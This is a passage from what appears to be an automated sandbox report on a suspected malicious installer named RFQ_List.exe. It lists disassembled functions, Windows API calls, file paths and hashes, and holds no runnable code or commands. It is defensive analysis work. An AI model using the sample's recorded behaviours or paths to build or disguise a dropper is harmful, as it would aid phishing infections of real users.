                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                  • String ID: {
                  • API String ID: 590372296-366298937
                  • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                  • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                  • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                  • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                  APIs
                  • GetDlgItem.USER32(?,000003FB), ref: 00404603
                  • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                  • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                  • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                  • lstrcmpiW.KERNEL32(Space required: ,0042D268,00000000,?,?), ref: 0040471B
                  • lstrcatW.KERNEL32(?,Space required: ), ref: 00404727
                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                    • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                    • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                    • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                    • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                    • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                  • String ID: A$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Space required:
                  • API String ID: 2624150263-2062246113
                  • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                  • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                  • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                  • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
                  • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                  • Opcode Fuzzy Hash: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
                  • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                  • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                  • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                  • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                  • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                  • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                  APIs
                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                  • GetDlgItem.USER32(?,000003E8), ref: 00404368
                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                  • GetSysColor.USER32(?), ref: 00404396
                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                  • lstrlenW.KERNEL32(?), ref: 004043B7
                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                  • GetDlgItem.USER32(?,0000040A), ref: 00404432
                  • SendMessageW.USER32(00000000), ref: 00404439
                  • GetDlgItem.USER32(?,000003E8), ref: 00404464
                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                  • SetCursor.USER32(00000000), ref: 004044B8
                  • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                  • SetCursor.USER32(00000000), ref: 004044DC
                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                  • String ID: -B@$N$Space required: $open
                  • API String ID: 3615053054-3693965759
                  • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                  • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                  • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                  • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                  APIs
                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32(?,?), ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F
                  • API String ID: 941294808-1304234792
                  • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                  • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                  • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                  • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                  APIs
                  • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                  • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                  • wsprintfA.USER32 ref: 00405DFB
                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                  • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                  • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                  • String ID: %ls=%ls$NUL$[Rename]
                  • API String ID: 222337774-899692902
                  • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                  • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                  • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                  • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                  APIs
                  • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                  • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                  • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                  • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                  Strings
                  • *?|<>/":, xrefs: 0040633B
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                  • "C:\Users\user\Desktop\RFQ_List.exe", xrefs: 0040632D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\RFQ_List.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 589700163-4120102305
                  • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                  • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                  • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                  • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                  APIs
                  • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                  • GetSysColor.USER32(00000000), ref: 004041B9
                  • SetTextColor.GDI32(?,00000000), ref: 004041C5
                  • SetBkMode.GDI32(?,?), ref: 004041D1
                  • GetSysColor.USER32(?), ref: 004041E4
                  • SetBkColor.GDI32(?,?), ref: 004041F4
                  • DeleteObject.GDI32(?), ref: 0040420E
                  • CreateBrushIndirect.GDI32(?), ref: 00404218
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                  • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                  • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                  • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                  APIs
                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                    • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: File$Pointer$ByteCharMultiWide$Read
                  • String ID: 9
                  • API String ID: 163830602-2366072709
                  • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                  • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                  • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                  • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                  APIs
                  • lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                  • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                  • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
                  • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
